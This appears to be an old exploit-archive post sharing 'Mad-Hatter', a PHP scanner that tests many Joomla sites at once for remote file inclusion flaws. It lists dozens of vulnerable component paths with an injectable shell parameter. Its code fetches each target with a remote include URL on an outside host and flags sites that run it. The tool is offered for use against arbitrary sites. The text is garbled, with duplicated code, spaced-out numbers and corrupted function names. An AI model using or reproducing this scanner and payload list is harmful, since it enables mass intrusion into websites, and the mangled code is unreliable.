Joomla Exploiter-exploit warning-the black bar safety net

2008-06-06T00:00:00
ID MYHACK58:62200819273
Type myhack58
Reporter 佚名
Modified 2008-06-06T00:00:00

Description

Author:Casi An old tool that was private way back, now public, the tool scans a Joomla site for a list of possible RFI exploits by including a text file below very very quickly, enjoy!

txt.txt

Code:

List.txt ./ com_directory/modules/mod_pxt_latest. php? GLOBALS[mosConfig_absolute_path]=$shell ./ administrator/components/com_juser/xajax_functions. php? mosConfig_absolute_path=$shell ./ administrator/components/com_jjgallery/admin. jjgallery. php? mosConfig_absolute_path=$shell ./ administrator/components/com_color/admin. color. php? mosConfig_live_site=$shell ./ administrator/components/com_joomla_flash_uploader/uninstall. joomla_flash_uploader. php? mosConfig_absolute_path=$shell ./ administrator/components/com_jcs/jcs. function. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/view/add. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/view/history. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/view/register. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/views/list. sub. html. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/views/reports. html. php? mosConfig_absolute_path=$shell ./ components/com_mp3_allopass/allopass. php? mosConfig_live_site=$shell ./ path/components/com_mp3_allopass/allopass-error. php? mosConfig_live_site=$shell ./ administrator/components/com_mosmedia/includes/credits. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/info. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/media. divs. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/media. divs. js. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/purchase. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/support. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_wmtportfolio/admin. wmtportfolio. php? mosConfig_absolute_path=$shell ./ administrator/components/com_wmtgallery/admin. wmtgallery. php? mosConfig_live_site=$shell ./ administrator/components/com_panoramic/admin. panoramic. php? mosConfig_live_site=$shell ./ components/com_slideshow/admin. slideshow1. php? mosConfig_live_site=$shell ./ administrator/components/com_joom12pic/admin. joom12pic. php? mosConfig_live_site=$shell ./ administrator/components/com_joomlaflashfun/admin. joomlaflashfun. php? mosConfig_live_site=$shell ./ administrator/components/com_joomlaradiov5/admin. joomlaradiov5. php? mosConfig_live_site=$shell ./ administrator/components/com_jpack/includes/CAltInstaller. php? mosConfig_absolute_path=$shell ./ components/com_articles. php? absolute_path=$shell ./ classes/html/com_articles. php? absolute_path=$shell ./ modules/mod_as_category/mod_as_category. php? mosConfig_absolute_path=$shell ./ modules/mod_as_category. php? mosConfig_absolute_path=$shell ./ components/com_mosmedia/media. tab. php? mosConfig_absolute_path=$shell ./ components/com_mosmedia/media. divs. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/contact_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/itemstatus_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/projectstatus_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/request_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/responses_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/timelog_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/urgency_type. php? mosConfig_absolute_path=$shell ./ components/com_joomlaboard/file_upload. php? sbp=$shell ./ administrator/components/com_swmenupro/ImageManager/Classes/ImageManager. php? mosConfig_absolute_path=$shell ./ components/com_swmenupro/ImageManager/Classes/ImageManager. php? mosConfig_absolute_path=$shell ./ components/com_reporter/reporter. logic. php? mosConfig_absolute_path=$shell ./ administrator/components/com_kochsuite/config. kochsuite. php? mosConfig_absolute_path=$shell ./ administrator/components/com_linkdirectory/toolbar. linkdirectory. html. php? mosConfig_absolute_path=$shell ./ components/com_artlinks/artlinks. dispnew. php? mosConfig_absolute_path=$shell ./ components/com_mtree/Savant2/Savant2_Plugin_textarea. php? mosConfig_absolute_path=$shell ./ administrator/components/com_jim/install. jim. php? mosConfig_absolute_path=$shell ./ administrator/components/com_webring/admin. webring. docs. php? component_dir=$shell ./ components/com_jd-wiki/lib/tpl/default/main. php? mosConfig_absolute_path=$shell ./ components/com_lmo/lmo. php? mosConfig_absolute_path=$shell ./ administrator/components/com_bayesiannaivefilter/lang. php? mosConfig_absolute_path=$shell <html> <body> <style>

body { background-color: #2b2b2b; background-image: url(images/background.gif); font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #B0B0B0; } . border { border: 1px solid #0 0 6 6 9 9; background-color:#0 0 0 0 0 0; } . header { background-color:#0 0 0 0 0 0; } . content-background { background-color:#0 0 0 0 0 0; } . text-strong { font-weight:bold; } . content-header { background-image:url(images/content-header.gif); } . content-border { border: 1px solid #0 0 6 6 9 9; background-color:#1A1A1A; } . content-background { background-color:#0 0 0 0 0 0; background-image:url(images/content-background.gif); } a:link { color: #0 0 6 6 9 9; } a:visited { color: #0 0 6 6 9 9; } a:hover { color: #CCCCCC; } a:active { color: #CCCCCC; } textarea { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #0 0 6 6 9 9; background-color:#1 6 1 6 1 6; border: #0 0 6 6 9 9 1px solid; } input { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #0 0 6 6 9 9; background-color:#1 6 1 6 1 6; border: #0 0 6 6 9 9 1px solid; } select { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #0 0 6 6 9 9; background-color:#1 6 1 6 1 6; border: #0 0 6 6 9 9 1px solid; } </style>

<? PHP if(isset($_POST['vic'])){

function rfi_scan($host, $list, $txt) { $rfi_vuln = array(); $line = file($list); foreach($line as $scan) { $scan = str_replace('$shell',$txt, $scan); $can = $host . $scan; $look = browse($can); if(ereg dividing("Mad-Hatter is the greatest!", $look)) { echo "<b>" . $can ."& lt;/b><br>"; }else{ echo "[~] Failed with $can <br>"; } } }

function browse($url) { $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt ($ch, CURLOPT_TIMEOUT, '1 0'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); $store = curl_exec ($ch); return $store; }

function arrise($input, $list, $check) { $input = explode("\n", $input); foreach($input as $array) { $y = 0; $x = count($array); while($y < $x) { rfi_scan($y, $list, $check); $y++; } }

}

function input_match($source, $num, $preg, $preg1) { $parts = explode($preg, $source); $parts = explode($preg1, $parts[$num]); $var = $parts[0]; return $parts[0]; }

echo arrise($_POST['vic'], $_POST['list'], $_POST['check']);

}else{ echo '<center> <table width="3 3%" height="9 0" border="0" cellpadding="3" cellspacing="1" class="content-border" id="table3"> <tr> <td class="content-background"> <div align="center"><center><font face="Trebuchet MS" size=3> <b>Private Joomla Scanner: Mad-Hatter</b> </font> </center> <br> <font face="Trebuchet MS" size=2 color=#0 0 6 6 9 9> <hr> <form method="POST" action="'.$ _SERVER['PHP_SELF'].'"& gt; Trojan List: <input type="text" name="list"value="http://sovol.fr/cv/RFI.txt"><br> Text to Check: <input type="text" name="check" value="http://sovol.fr/cv/txt.txt"><br> Site to Check: <textarea name="vic" cols="6 4" rows="1 6">Put all sites per line</textarea> <input type="submit" name="submit" value="Scan">';

$list = $_POST['list']; $check = $_POST['check']; $vic = $_POST['vic']; } ?& gt;<html><br/><body><br/><style><br/><br/>body {<br/> background-color: #2b2b2b;<br/> background-image: url(images/background.gif);<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 12px;<br/> color: #B0B0B0;<br/>}<br/>. border<br/>{<br/>border: 1px solid #0 0 6 6 9 9;<br/>background-color:#0 0 0 0 0 0;<br/>}<br/>. header<br/>{<br/>background-color:#0 0 0 0 0 0;<br/>}<br/>. content-background<br/>{<br/>background-color:#0 0 0 0 0 0;<br/>}<br/>. text-strong<br/>{<br/>font-weight:bold;<br/>}<br/>. content-header<br/>{<br/>background-image:url(images/content-header.gif);<br/>}<br/>. content-border<br/>{<br/>border: 1px solid #0 0 6 6 9 9;<br/>background-color:#1A1A1A;<br/>}<br/>. content-background<br/>{<br/>background-color:#0 0 0 0 0 0;<br/>background-image:url(images/content-background.gif);<br/>}<br/>a:link {<br/> color: #0 0 6 6 9 9;<br/>}<br/>a:visited {<br/> color: #0 0 6 6 9 9;<br/> }<br/>a:hover {<br/> color: #CCCCCC;<br/>}<br/>a:active {<br/> color: #CCCCCC;<br/>}<br/>textarea<br/>{<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 10px;<br/> color: #0 0 6 6 9 9;<br/> background-color:#1 6 1 6 1 6;<br/> border: #0 0 6 6 9 9 1px solid;<br/>}<br/>input<br/>{<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 10px;<br/> color: #0 0 6 6 9 9;<br/> background-color:#1 6 1 6 1 6;<br/> border: #0 0 6 6 9 9 1px solid;<br/> }<br/> select<br/> {<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 10px;<br/> color: #0 0 6 6 9 9;<br/> background-color:#1 6 1 6 1 6;<br/> border: #0 0 6 6 9 9 1px solid;<br/> }<br/></style><br/><br/><br/><? PHP<br/>if(isset($_POST['vic'])){<br/><br/>function rfi_scan($host, $list, $txt)<br/>{<br/>$rfi_vuln = array();<br/>$line = file($list);<br/> foreach($line as $scan)<br/> {< br/> $scan = str_replace('$shell',$txt, $scan);<br/> $can = $host . $scan;<br/> $look = browse($can);<br/> if(ereg dividing("Mad-Hatter is the greatest!", $look))<br/> {<br/> echo "<b>" . $can ."& lt;/b><br>";<br/> }else{<br/> echo "[~] Failed with $can <br>";<br/> }<br/> }<br/>}<br/><br/>function browse($url)<br/>{<br/> $ch = curl_init();<br/> curl_setopt ($ch, CURLOPT_URL, $url);<br/> curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");<br/> curl_setopt ($ch, CURLOPT_TIMEOUT, '1 0');<br/> curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);<br/> curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);< br/> $store = curl_exec ($ch);<br/>return $store;<br/>}<br/><br/>function arrise($input, $list, $check)<br/>{<br/> $input = explode("\n", $input);<br/> foreach($input as $array)<br/> {<br/> $y = 0;<br/> $x = count($array);<br/> while($y < $x)<br/> {<br/> rfi_scan($y, $list, $check);<br/> $y++;<br/> }<br/> }<br/>< br/>}<br/><br/>function input_match($source, $num, $preg, $preg1)<br/>{<br/>$parts = explode($preg, $source);<br/> $parts = explode($preg1, $parts[$num]);<br/> $var = $parts[0];<br/>return $parts[0];<br/>}<br/><br/>echo arrise($_POST['vic'], $_POST['list'], $_POST['check']); <br/><br/>}else{<br/>echo '<center><br/><table width="3 3%" height="9 0" border="0" cellpadding="3" cellspacing="1" class="content-border" id="table3"><br/><tr><br/>< td class="content-background"><br/><div align="center"><center><font face="Trebuchet MS" size=3><br/> <b>Private Joomla Scanner: Mad-Hatter</b><br/></font><br/></center>< br/><br><br/><font face="Trebuchet MS" size=2 color=#0 0 6 6 9 9><br/><hr><br/>

<form method="POST" action="'.$ _SERVER['PHP_SELF'].'"& gt;<br/>Trojandownloader List: <input type="text" name="list" value="http://sovol.fr/cv/RFI.txt"><br><br/>Text to Check:

<input type="text" name="check" value="http://sovol.fr/cv/txt.txt"><br><br/>the Site to Check: <textarea name="vic" cols="6 4" rows="1 6">

Put all sites per line</textarea><br/><input type="submit" name="submit" value="Scan">';<br/><br/>$list = $_POST['list'];<br/>$check = $_POST['check'];<br/>$vic = $_POST['vic'];<br/>} <br/>?& gt;